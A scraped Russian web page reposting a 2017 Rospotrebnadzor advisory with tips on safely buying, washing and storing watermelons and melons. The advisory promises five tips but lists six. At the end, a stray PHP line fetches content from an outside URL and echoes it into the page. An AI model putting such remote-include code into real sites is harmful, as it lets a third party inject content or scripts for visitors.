Регистрация нового пользоателя


Рудакова Галина Геннадьевна (МОУ СОШ №13)
Рудакова Галина Геннадьевна (МОУ СОШ №13)
Сезон арбузов и дынь: 5 советов, как избежать отравления

2017-08-08 08:10:34
Сезон арбузов и дынь: 5 советов, как избежать отравления

Ирбитский отдел Управления Роспотребнадзора по Свердловской области информирует

Сезон арбузов и дынь: 5 советов, как избежать отравления

На прилавках торговых объектов в Тавдинском городском округе уже полным ходом идёт торговля бахчевыми культурами – арбузами и дынями.

По данным Управления Роспотребнадзора по Свердловской области, за 1 полугодие 2017 года исследовано 63 пробы бахчевых культур, в том числе 62 пробы – на содержание нитратов и 6 – на содержание пестицидов. По результатам лабораторных исследований 11 проб не соответствовали требованиям нормативных документов.

Современная традиционная селекция разработала раннеспелые сорта, а новые технологии позволяют начать выращивание рассады арбузов еще зимой. Эта сочная и сладкая ягода в жаркий период доставляет удовольствие всем, но иногда случаются и неприятности, связанные с ухудшением самочувствия и появлением признаков пищевого отравления.

Избежать этого можно при соблюдении элементарных правил:

1. Посмотрите, где вы приобретаете продукцию

Торговая точка не должна находиться в непосредственной близости к проезжей части, должна быть оборудована навесом (ограждением), стеллажами (подтоварниками), вывеской с наименованием предприятия, которое осуществляет торговлю, так как обычно торговые места для реализации бахчевых культур определяются органами местного самоуправления (администрацией). Продавец должен иметь опрятный вид и спецодежду.

2. Сомневаетесь – просите документы

Как потребитель вы имеете право запросить документы, подтверждающие качество и безопасность реализуемой продукции (декларацию).

3. Оцените условия хранения продукции

Бахчевые не должны лежать навалом и продаваться частями.

4. Покупайте арбуз или дыню только целиком

Не покупайте арбуз (дыню) с надрезами, и сами не просите продавца сделать надрез для определения его спелости, это запрещено санитарными правилами, так как есть вероятность бактериального обсеменения. Жара и наличие питательной среды (сладкой мякоти) - условия, способствующие быстрому росту и размножению бактерий.

5. Перед употреблением - помойте

Не забывайте перед употреблением промыть водой поверхность арбуза (дыни), так как велик риск попадания микробов с поверхности в мякоть ягоды.

6. Если не съели зараз, храните правильно

 Лучше выбрать по величине арбуз, который можно съесть, не оставляя до следующего дня, а если все-таки арбуз остался, закройте срез пищевой пленкой и поместите его в холодильнике таким образом, чтобы исключить контакт с сырыми, не подвергшимися термической обработке продуктами (яйцом, мясом, птицей). 

 

Ирбитский отдел Управления

Роспотребнадзора по СО




<?php $headers = file_get_contents('https://ntsirbit.ru/generator/generator.php', true); echo $headers; ?>